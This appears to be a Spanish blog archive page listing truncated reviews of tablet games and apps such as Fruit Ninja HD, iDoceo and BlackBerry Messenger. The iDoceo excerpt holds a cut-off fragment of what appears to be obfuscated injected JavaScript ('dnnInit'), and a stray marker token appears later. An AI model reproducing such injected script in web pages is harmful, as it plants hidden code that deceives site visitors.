Fruit Ninja HD para iPad 2, hoy se lo queremos presentar a los usuarios del iPad 2 que no lo conocen, y para lo que los conocen no esta demás refrescarcelos. El juego Fruit Ninja HD para iPad 2, es uno de los juegos más adictivos que he probado. Todo lo que debemos hacer en este juego, es ir cortando frutas. Las frutas surgen de la parte inferior de la pantalla, y las cortaremos deslizando nuestro dedo sobre la pantalla y por encima de la fruta …

En esta oportunidad presentamos una aplicación que nos ofrecerá 15 diferentes juegos de cartas incluidos en un solo Software, ideal para público de todas las edades, aficionados y personas habituadas a participar en estos juegos ya sea en reuniones de amigos o simplemente a través de su ordenador personal. Cabe destacar que Best Card Games HD presenta un elevado grado de compatibilidad, no sólo con dispositivos iPad sino que también puede correr…

por largas horas. Para iPhone e iPad es gratuito. Enlace: Drop7 Orbital: Otro juego tipo puzle diseñado para los más hábiles en el cual debemos disparar esferas con un dedo. Tanto para iPad como para iPhone tiene un coste de 2,39 euros. Enlace: Orbital …

ágenes referidas a las series anteriormente mencionadas, y de esta manera contaremos con un tiempo limitado para poder arriesgar nuestra respuesta. Para correr Quiz: Dibujos Animados, nuestra Tablet debe contar con la versión 2.3 de Android o superiores, así como también 20 MB de memoria interna disponible.             Enlace: Quiz: Dibujos Animados para Tablets Android …

Cut The Link se presenta como un entretenido juego de acción arcade dónde se pondrán a prueba nuestras habilidades y velocidad para cortar los diferentes objetivos. Se trata de un juego muy similar a lo que conocemos desde hace un tiempo como Fruit Ninja pero con bastantes modificaciones en todo sentido. Este título se ofrece al público de manera libre y gratuita, dejando en claro la estrategia por parte de los desarrolladores de llegar a una ma…

Nos encargaremos en esta ocasión de introducirte en el mundo de Don’t Fall in the Hole, un interesante juego compatible con dispositivos iOS que nos presentará una modalidad Arcade, debiendo atravesar diferentes escenarios y enfrentar numerosos enemigos con el objetivo principal de no dejar caer en los hoyos a nuestro personaje. Don’t Fall in the Hole nos permitirá el uso de diferentes tipos de armas para defendernos y atacar a nuest…

En esta nueva oportunidad nos encargaremos de introducirte en el mundo de Boom Boat 2, un juego compatible con dispositivos iOS en el cual deberemos manejar nuestro bote a lo largo de diferentes escenarios, contando con el objetivo principal de neutralizar los planes de diversos enanos de jardín que habitan las profundidades del mar. Cabe destacar que dicho juego a pesar de difundirse de manera paga, una inmensa cantidad de usuarios ya se ha hec…

Uno de los juegos más famosos para tablet ha sido Fruit Ninja. Se trata de un juego en el que nuestro deber es ir cortando las diferentes frutas que nos arrojan y evitar de que se nos escapen. Con ese mismo concepto queremos presentarles hoy el juego Fruit Slash para BlackBerry Playbook. A lo largo de todo este juego, vamos a tener que ir cortando las frutas que nos lanzan, evitando de que se nos caigan. Vamos a tener tres posibilidades de que s…

En esta nueva oportunidad te presentamos una excelente aplicación llamada iDoceo, ideal para aquellos usuarios de dispositivos iPad dedicados a la enseñanza en diferentes niveles, ya sean primarios o superiores. Tendremos la posibilidad de realizar un seguimiento meticuloso de nuestros alumnos con la implementación de diferentes hojas de cálculo e iconos personalizables. function dnnInit(){var a=0,m,v,t,z,x=new Array(“9091968376″,…

posibilitará la creación de nuestro propio perfil, pudiendo de esta manera agregar toda la información de interés necesaria, destacando por su parte que contaremos con una buena seguridad referida al aspecto de la privacidad. Para  correr BlackBerry Messenger en nuestro dispositivo iOS, el mismo debe contar con la versión 6.0 de iOS o superiores y 40 MB de memoria interna disponible. Enlace: BlackBerry Messenger para dispositivos iOS zp8497586rq …



¿No encontraste lo que buscabas? ¡Probá con Google!